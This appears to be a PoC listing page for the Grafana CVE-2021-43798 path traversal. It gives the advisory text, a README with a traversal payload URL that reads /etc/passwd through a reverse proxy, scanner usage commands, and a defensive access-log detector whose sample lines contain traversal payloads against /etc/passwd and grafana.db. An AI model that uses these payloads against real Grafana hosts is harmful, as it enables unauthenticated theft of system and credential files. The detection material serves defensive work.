
CVE-2021-43798 PoC — Grafana path traversal

Associated Vulnerability
Title: Grafana path traversal (CVE-2021-43798)
Description: Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) are vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/<plugin-id>/`, where `<plugin-id>` is the plugin ID of any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
Description
PoC for the Grafana CVE-2021-43798 arbitrary file read vulnerability. It checks each installed plugin in turn (multi-plugin polling) and accepts either a single URL or a list of URLs read from a file.
Readme
# CVE-2021-43798-grafana_fileread
**If the target sits behind a reverse proxy, replace the payload with this line:**
```
# Reverse-proxy variant: the "/#/" segment followed by percent-encoded separators
# survives the proxy's path normalisation; "plugins" is the plugin ID read from plugins.txt
url1 = url + "/public/plugins/" + plugins.rstrip() + "/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"
```
Grafana is a cross-platform, open-source data visualisation web application. Once a user has configured a data source, Grafana renders charts and alerts for that data in the browser.  
Grafana contains an unauthenticated arbitrary file read vulnerability: an attacker can read arbitrary files on the host without any authentication.

CVE: CVE-2021-43798  
Component: Grafana  
Vulnerability type: file read  
Impact: disclosure of sensitive information  
Summary: an unauthenticated attacker can use this vulnerability to obtain sensitive files from the server
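Because the vulnerable path is always `/public/plugins/<plugin-id>/` followed by a path that climbs out of the plugin directory, the attack is easy to spot in web-server or reverse-proxy access logs. The following detector is an added example written for this page; it is not part of the PoC repository or of Grafana. The log lines, IP addresses and timestamps are constructed, and the log format is assumed to be the common "combined" format used by nginx and Apache. The check decodes the request path repeatedly (to catch `%2e%2e`, `..%2f` and double-encoded variants) and flags any `..` segment that appears under the plugin prefix, which also covers the reverse-proxy `/#/../` variant shown in this README because the `#` is a literal character in the logged request line.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (nginx/Apache "combined" style); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Dec/2021:10:01:02 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1832
10.0.0.6 - - [08/Dec/2021:10:01:05 +0000] "GET /public/plugins/welcome/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd HTTP/1.1" 200 1832
10.0.0.7 - - [08/Dec/2021:10:01:09 +0000] "GET /public/plugins/graph/module.js HTTP/1.1" 200 52301
10.0.0.8 - - [08/Dec/2021:10:01:12 +0000] "GET /public/plugins/alertlist/%2e%2e/%2e%2e/%2e%2e/var/lib/grafana/grafana.db HTTP/1.1" 403 0
10.0.0.9 - - [08/Dec/2021:10:01:15 +0000] "GET /api/health HTTP/1.1" 200 15
10.0.0.10 - - [08/Dec/2021:10:01:18 +0000] "GET /public/plugins/welcome/#/../..%2f..%2f..%2f..%2f/etc/passwd HTTP/1.1" 200 1832
"""

# Minimal "combined"-format parser: client IP, timestamp, method, request path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

PLUGIN_PREFIX = "/public/plugins/"


def decode_fully(path, max_rounds=3):
    """Percent-decode until the string stops changing, so double-encoded
    sequences such as %252e%252e are reduced to '..' as well."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_plugin_traversal(raw_path):
    """True if the request targets /public/plugins/<id>/ and, after decoding,
    contains a '..' path segment (i.e. it climbs out of the plugin directory).
    The query string is discarded; '#' is kept because a scanner sends it
    literally and the server logs it as part of the path."""
    path = raw_path.split("?", 1)[0]
    decoded = decode_fully(path).replace("\\", "/")
    if not decoded.startswith(PLUGIN_PREFIX):
        return False
    segments = decoded[len(PLUGIN_PREFIX):].split("/")
    # A legitimate asset request is <plugin-id>/<file>; any '..' segment is traversal.
    return any(seg == ".." for seg in segments)


def scan_access_log(text):
    """Return (client_ip, status, decoded_path) for every traversal attempt.
    A 200 status with a non-zero body size on one of these lines means the
    file read most likely succeeded and the host should be treated as compromised."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if is_plugin_traversal(m.group("path")):
            hits.append((m.group("ip"), m.group("status"), decode_fully(m.group("path"))))
    return hits


if __name__ == "__main__":
    for ip, status, path in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {status} {path}")
```

Run it over a real access log by replacing `SAMPLE_LOG` with the file contents; a hit with status 200 is the signal to check the patch level (8.0.7 / 8.1.8 / 8.2.7 / 8.3.1 or later) and to rotate any secrets stored in files the path pointed at, such as `grafana.db` or the Grafana configuration.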

# Usage
1. Scan a single URL
```
python3 grafana_fileread.py -u http://localhost:3000
```
![image](https://user-images.githubusercontent.com/62680449/145163470-5f0758dc-9614-4572-a163-b900fc19564d.png)
The retrieved data can be viewed in the file `grafana 8.x_fileread_vuln.txt`
![image](https://user-images.githubusercontent.com/62680449/145163393-fc08d974-703e-496b-94cf-cde75e394929.png)
2. Scan the targets listed in a file
```
python3 grafana_fileread.py -u http://localhost:3000
```
![image](https://user-images.githubusercontent.com/62680449/145163579-1233da26-85e7-4cda-a05c-58e521eeb1b4.png)

3. `-h` shows the help text
![image](https://user-images.githubusercontent.com/62680449/145163618-6c1c33d9-bf2a-4880-8ce2-d18d405fd4ee.png)
File Snapshot

```
[4.0K] /data/pocs/e9ccff09cba52a9d8a5e5a5a4e71f37c3606f0c6
├── [3.4K] grafana_fileread.py
├── [ 456] plugins.txt
├── [1.4K] README.md
└── [  22] urls.txt

1 directory, 4 files
```